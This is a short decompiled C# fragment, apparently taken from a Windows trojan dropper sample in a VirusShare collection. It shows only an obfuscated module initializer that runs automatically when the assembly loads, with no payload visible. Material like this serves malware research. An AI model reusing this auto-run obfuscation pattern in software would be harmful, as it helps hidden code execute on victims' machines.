// Decompiled with JetBrains decompiler // Type: // Assembly: ss20, Version=1.1.1.1, Culture=neutral, PublicKeyToken=null // MVID: 4385E1A7-2FA8-4895-8952-90E8ECDFEF6F // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.awrl-32c3dc21d69dcf58806a205f7919ff769fda4c1659e61dc7d2c60838850ea6d5.exe internal class \u003CModule\u003E { static \u003CModule\u003E() => \u000E.\u0002(); }